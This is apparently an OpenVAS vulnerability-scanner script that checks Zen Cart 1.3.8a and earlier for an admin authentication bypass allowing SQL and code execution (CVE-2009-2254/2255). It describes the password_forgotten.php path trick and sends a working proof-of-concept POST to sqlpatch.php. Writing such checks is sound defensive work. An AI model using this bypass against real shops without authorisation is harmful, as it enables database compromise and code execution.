###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_zencart_code_exec_vuln.nasl 3192 2009-07-02 13:31:17Z jul $
#
# Zen Cart Arbitrary Code Execution Vulnerability
#
# Authors:
# Sharath S <sharaths@secpod.com>
#
# Copyright:
# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_id(800820);
  script_version("$Revision: 1.0 $");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"risk_factor", value:"High");
  script_cve_id("CVE-2009-2254", "CVE-2009-2255");
  script_bugtraq_id(35467, 35468);
  script_name("Zen Cart Arbitrary Code Execution Vulnerability");
  desc = "

  Overview: The host is running Zen Cart and is prone to Arbitrary Code
  Execution vulnerability.

  Vulnerability Insight:
  - Error in admin/sqlpatch.php file due to lack of sanitisation of the input
    query sting passed into the 'query_string' parameter in an execute action
    in conjunction with a PATH_INFO of password_forgotten.php file.
  - Access to admin/record_company.php is not restricted and can be exploited
    via the record_company_image parameter in conjunction with a PATH_INFO of
    password_forgotten.php, then accessing this file via a direct request to
    the file in images/.

  Impact:
  Successful exploitation will let the remote attacker to execute SQL commands
  or arbitrary code by uploading a .php file, and compromise the application,
  or exploit latent vulnerabilities in the underlying database.

  Impact Level: Application

  Affected Software/OS:
  Zen Cart version 1.3.8a and prior

  Fix: Apply security patch from below link,
  http://www.zen-cart.com/forum/attachment.php?attachmentid=5965

  References:
  http://secunia.com/advisories/35550
  http://www.milw0rm.com/exploits/9004
  http://www.milw0rm.com/exploits/9005
  http://www.zen-cart.com/forum/showthread.php?t=130161

  CVSS Score:
    CVSS Base Score     : 7.5 (AV:N/AC:L/Au:NR/C:P/I:P/A:P)
    CVSS Temporal Score : 5.9
  Risk factor: High";

  script_description(desc);
  script_summary("Check for the Attack of Zen Cart");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2009 Intevation GmbH");
  script_family("Web application abuses");
  script_dependencies("find_service.nes", "http_version.nasl");
  script_require_ports("Services/www", 80);
  exit(0);
}


include("http_func.inc");

zencartPort = get_http_port(default:80);
if(!zencartPort){
  zencartPort = 80;
}

if(!get_port_state(zencartPort)){
  exit(0);
}

foreach dir (make_list ("/", "/zencart", "/cart", cgi_dirs()))
{
  sndReq = http_get(item:dir + "/admin/login.php", port:zencartPort);
  rcvRes = http_send_recv(data:sndReq, port:zencartPort);

  if(rcvRes =~ "<title>Zen Cart!</title>" && (!safe_checks()) &&
     egrep(pattern:"^HTTP/.* 200 OK", string:rcvRes))
  {
    postdata = string('query_string=;');
    req = string(
     "POST /", dir, "/admin/sqlpatch.php/password_forgotten.php?" +
                    "action=execute HTTP/1.1\r\n",
     "Host: ", get_host_name(), "\r\n",
     "Content-Type: application/x-www-form-urlencoded\r\n",
     "Content-Length: ", strlen(postdata), "\r\n",
     "\r\n",
     postdata
  );
  res = http_send_recv(port:zencartPort, data:req, bodyonly:TRUE);

   if("1 statements processed" >< res)
   {
     security_warning(zencartPort);
     exit(0);
    }
  }
}
